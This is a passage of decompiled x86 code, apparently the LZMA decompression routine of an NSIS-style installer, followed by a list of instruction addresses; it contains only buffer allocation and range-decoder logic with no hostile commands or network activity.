                                                  									goto L1;
                                                  								}
                                                  								if(__ebx >= 0x100) {
                                                  									goto L53;
                                                  								}
                                                  								goto L40;
                                                  							} else {
                                                  								L36:
                                                  								if( *(__ebp - 0x6c) == 0) {
                                                  									 *(__ebp - 0x88) = 0xd;
                                                  									L170:
                                                  									_t568 = 0x22;
                                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                  									_t535 = 0;
                                                  									L172:
                                                  									return _t535;
                                                  								}
                                                  								__ecx =  *(__ebp - 0x70);
                                                  								__eax =  *(__ebp - 0xc);
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								_t121 = __ebp - 0x70;
                                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								goto L38;
                                                  							}
                                                  						}
                                                  					}
                                                  					L1:
                                                  					_t534 =  *(_t614 - 0x88);
                                                  					if(_t534 > 0x1c) {
                                                  						L171:
                                                  						_t535 = _t534 | 0xffffffff;
                                                  						goto L172;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                  						case 0:
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							_t534 =  *( *(_t614 - 0x70));
                                                  							if(_t534 > 0xe1) {
                                                  								goto L171;
                                                  							}
                                                  							_t538 = _t534 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t570);
                                                  							_push(9);
                                                  							_pop(_t571);
                                                  							_t610 = _t538 / _t570;
                                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                                  							 *(_t614 - 0x3c) = _t605;
                                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                  								L10:
                                                  								if(_t613 == 0) {
                                                  									L12:
                                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                  									goto L15;
                                                  								} else {
                                                  									goto L11;
                                                  								}
                                                  								do {
                                                  									L11:
                                                  									_t613 = _t613 - 1;
                                                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                  								} while (_t613 != 0);
                                                  								goto L12;
                                                  							}
                                                  							if( *(_t614 - 4) != 0) {
                                                  								GlobalFree( *(_t614 - 4));
                                                  							}
                                                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  							 *(_t614 - 4) = _t534;
                                                  							if(_t534 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                  								goto L10;
                                                  							}
                                                  						case 1:
                                                  							L13:
                                                  							__eflags =  *(_t614 - 0x6c);
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 1;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							_t45 = _t614 - 0x48;
                                                  							 *_t45 =  *(_t614 - 0x48) + 1;
                                                  							__eflags =  *_t45;
                                                  							L15:
                                                  							if( *(_t614 - 0x48) < 4) {
                                                  								goto L13;
                                                  							}
                                                  							_t546 =  *(_t614 - 0x40);
                                                  							if(_t546 ==  *(_t614 - 0x74)) {
                                                  								L20:
                                                  								 *(_t614 - 0x48) = 5;
                                                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                  								goto L23;
                                                  							}
                                                  							 *(_t614 - 0x74) = _t546;
                                                  							if( *(_t614 - 8) != 0) {
                                                  								GlobalFree( *(_t614 - 8));
                                                  							}
                                                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                  							 *(_t614 - 8) = _t534;
                                                  							if(_t534 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								goto L20;
                                                  							}
                                                  						case 2:
                                                  							L24:
                                                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                  							 *(_t614 - 0x84) = 6;
                                                  							 *(_t614 - 0x4c) = _t553;
                                                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                  							goto L132;
                                                  						case 3:
                                                  							L21:
                                                  							__eflags =  *(_t614 - 0x6c);
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 3;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							_t67 = _t614 - 0x70;
                                                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                  							__eflags =  *_t67;
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                  							L23:
                                                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                  							if( *(_t614 - 0x48) != 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L24;
                                                  						case 4:
                                                  							goto L133;
                                                  						case 5:
                                                  							goto L137;
                                                  						case 6:
                                                  							goto L0;
                                                  						case 7:
                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                  							if( *(__ebp - 0x40) != 1) {
                                                  								__eax =  *(__ebp - 0x24);
                                                  								 *(__ebp - 0x80) = 0x16;
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x28);
                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  								__eax = 0;
                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                  								__eflags = __eax;
                                                  								 *(__ebp - 0x58) = __eax;
                                                  								goto L68;
                                                  							}
                                                  							__eax =  *(__ebp - 4);
                                                  							__ecx =  *(__ebp - 0x38);
                                                  							 *(__ebp - 0x84) = 8;
                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  							goto L132;
                                                  						case 8:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xa;
                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x38);
                                                  								__ecx =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                  								 *(__ebp - 0x84) = 9;
                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  							}
                                                  							goto L132;
                                                  						case 9:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								goto L89;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x60);
                                                  							if( *(__ebp - 0x60) == 0) {
                                                  								goto L171;
                                                  							}
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  							__eflags = _t258;
                                                  							0 | _t258 = _t258 + _t258 + 9;
                                                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  							goto L75;
                                                  						case 0xa:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xb;
                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x28);
                                                  							goto L88;
                                                  						case 0xb:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__ecx =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x20);
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x24);
                                                  							}
                                                  							__ecx =  *(__ebp - 0x28);
                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  							L88:
                                                  							__ecx =  *(__ebp - 0x2c);
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  							L89:
                                                  							__eax =  *(__ebp - 4);
                                                  							 *(__ebp - 0x80) = 0x15;
                                                  							__eax =  *(__ebp - 4) + 0xa68;
                                                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  							goto L68;
                                                  						case 0xc:
                                                  							L99:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xc;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t334 = __ebp - 0x70;
                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t334;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							__eax =  *(__ebp - 0x2c);
                                                  							goto L101;
                                                  						case 0xd:
                                                  							goto L36;
                                                  						case 0xe:
                                                  							goto L45;
                                                  						case 0xf:
                                                  							goto L57;
                                                  						case 0x10:
                                                  							L109:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x10;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t365 = __ebp - 0x70;
                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t365;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							goto L111;
                                                  						case 0x11:
                                                  							L68:
                                                  							__esi =  *(__ebp - 0x58);
                                                  							 *(__ebp - 0x84) = 0x12;
                                                  							goto L132;
                                                  						case 0x12:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 0x58);
                                                  								 *(__ebp - 0x84) = 0x13;
                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							__eflags = __eax;
                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  							goto L130;
                                                  						case 0x13:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								_t469 = __ebp - 0x58;
                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  								__eflags =  *_t469;
                                                  								 *(__ebp - 0x30) = 0x10;
                                                  								 *(__ebp - 0x40) = 8;
                                                  								L144:
                                                  								 *(__ebp - 0x7c) = 0x14;
                                                  								goto L145;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							 *(__ebp - 0x30) = 8;
                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  							L130:
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							 *(__ebp - 0x40) = 3;
                                                  							goto L144;
                                                  						case 0x14:
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  							__eax =  *(__ebp - 0x80);
                                                  							goto L140;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L120;
                                                  						case 0x16:
                                                  							__eax =  *(__ebp - 0x30);
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx =  *(__ebp - 4);
                                                  							 *(__ebp - 0x40) = 6;
                                                  							__eax = __eax << 7;
                                                  							 *(__ebp - 0x7c) = 0x19;
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							goto L145;
                                                  						case 0x17:
                                                  							L145:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							 *(__ebp - 0x50) = 1;
                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  							goto L149;
                                                  						case 0x18:
                                                  							L146:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x18;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t484 = __ebp - 0x70;
                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t484;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L148:
                                                  							_t487 = __ebp - 0x48;
                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                  							__eflags =  *_t487;
                                                  							L149:
                                                  							__eflags =  *(__ebp - 0x48);
                                                  							if( *(__ebp - 0x48) <= 0) {
                                                  								__ecx =  *(__ebp - 0x40);
                                                  								__ebx =  *(__ebp - 0x50);
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  								__eax =  *(__ebp - 0x7c);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								goto L140;
                                                  							}
                                                  							__eax =  *(__ebp - 0x50);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__esi = __edx + __eax;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								 *(__ebp - 0x50) = __edx;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L148;
                                                  							} else {
                                                  								goto L146;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								 *(__ebp - 0x2c) = __ebx;
                                                  								L119:
                                                  								_t393 = __ebp - 0x2c;
                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  								__eflags =  *_t393;
                                                  								L120:
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  									goto L170;
                                                  								}
                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                  									goto L171;
                                                  								}
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  								__eax =  *(__ebp - 0x30);
                                                  								_t400 = __ebp - 0x60;
                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  								__eflags =  *_t400;
                                                  								goto L123;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								 *(__ebp - 0x48) = __ecx;
                                                  								L102:
                                                  								__eflags =  *(__ebp - 0x48);
                                                  								if( *(__ebp - 0x48) <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									 *(__ebp - 0x40) = 4;
                                                  									 *(__ebp - 0x2c) = __eax;
                                                  									__eax =  *(__ebp - 4);
                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                  									__eflags = __eax;
                                                  									L108:
                                                  									__ebx = 0;
                                                  									 *(__ebp - 0x58) = __eax;
                                                  									 *(__ebp - 0x50) = 1;
                                                  									 *(__ebp - 0x44) = 0;
                                                  									 *(__ebp - 0x48) = 0;
                                                  									L112:
                                                  									__eax =  *(__ebp - 0x40);
                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  										_t391 = __ebp - 0x2c;
                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  										__eflags =  *_t391;
                                                  										goto L119;
                                                  									}
                                                  									__eax =  *(__ebp - 0x50);
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  									__eax =  *(__ebp - 0x58);
                                                  									__esi = __edi + __eax;
                                                  									 *(__ebp - 0x54) = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                  										__ecx = 0;
                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  										__ecx = 1;
                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  										__ebx = 1;
                                                  										__ecx =  *(__ebp - 0x48);
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx =  *(__ebp - 0x44);
                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										 *__esi = __ax;
                                                  										 *(__ebp - 0x50) = __edi;
                                                  									} else {
                                                  										 *(__ebp - 0x10) = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                  										L111:
                                                  										_t368 = __ebp - 0x48;
                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                  										__eflags =  *_t368;
                                                  										goto L112;
                                                  									} else {
                                                  										goto L109;
                                                  									}
                                                  								}
                                                  								__ecx =  *(__ebp - 0xc);
                                                  								__ebx = __ebx + __ebx;
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  									__ecx =  *(__ebp - 0x10);
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									 *(__ebp - 0x44) = __ebx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									L101:
                                                  									_t338 = __ebp - 0x48;
                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                  									__eflags =  *_t338;
                                                  									goto L102;
                                                  								} else {
                                                  									goto L99;
                                                  								}
                                                  							}
                                                  							__edx =  *(__ebp - 4);
                                                  							__eax = __eax - __ebx;
                                                  							 *(__ebp - 0x40) = __ecx;
                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  							goto L108;
                                                  						case 0x1a:
                                                  							goto L55;
                                                  						case 0x1b:
                                                  							L75:
                                                  							__eflags =  *(__ebp - 0x64);
                                                  							if( *(__ebp - 0x64) == 0) {
                                                  								 *(__ebp - 0x88) = 0x1b;
                                                  								goto L170;
                                                  							}
                                                  							__eax =  *(__ebp - 0x14);
                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  							__eflags = __eax -  *(__ebp - 0x74);
                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                  								__eflags = __eax;
                                                  							}
                                                  							__edx =  *(__ebp - 8);
                                                  							__cl =  *(__eax + __edx);
                                                  							__eax =  *(__ebp - 0x14);
                                                  							 *(__ebp - 0x5c) = __cl;
                                                  							 *(__eax + __edx) = __cl;
                                                  							__eax = __eax + 1;
                                                  							__edx = 0;
                                                  							_t274 = __eax %  *(__ebp - 0x74);
                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                  							__edx = _t274;
                                                  							__eax =  *(__ebp - 0x68);
                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  							_t283 = __ebp - 0x64;
                                                  							 *_t283 =  *(__ebp - 0x64) - 1;
                                                  							__eflags =  *_t283;
                                                  							 *( *(__ebp - 0x68)) = __cl;
                                                  							goto L79;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L123:
                                                  								__eflags =  *(__ebp - 0x64);
                                                  								if( *(__ebp - 0x64) == 0) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx =  *(__ebp - 8);
                                                  								__cl =  *(__eax + __edx);
                                                  								__eax =  *(__ebp - 0x14);
                                                  								 *(__ebp - 0x5c) = __cl;
                                                  								 *(__eax + __edx) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                  								__edx = _t414;
                                                  								__eax =  *(__ebp - 0x68);
                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  								__eflags =  *(__ebp - 0x30);
                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                  								 *(__ebp - 0x14) = __edx;
                                                  								if( *(__ebp - 0x30) > 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L80;
                                                  								}
                                                  							}
                                                  							 *(__ebp - 0x88) = 0x1c;
                                                  							goto L170;
                                                  					}
                                                  				}
                                                  			}













                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406477
                                                  0x0040647a
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f7
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x00406504
                                                  0x00406507
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064a7
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x004066de
                                                  0x004066de
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406480
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x00000000
                                                  0x004063ee
                                                  0x0040647a
                                                  0x00406383
                                                  0x004061b7
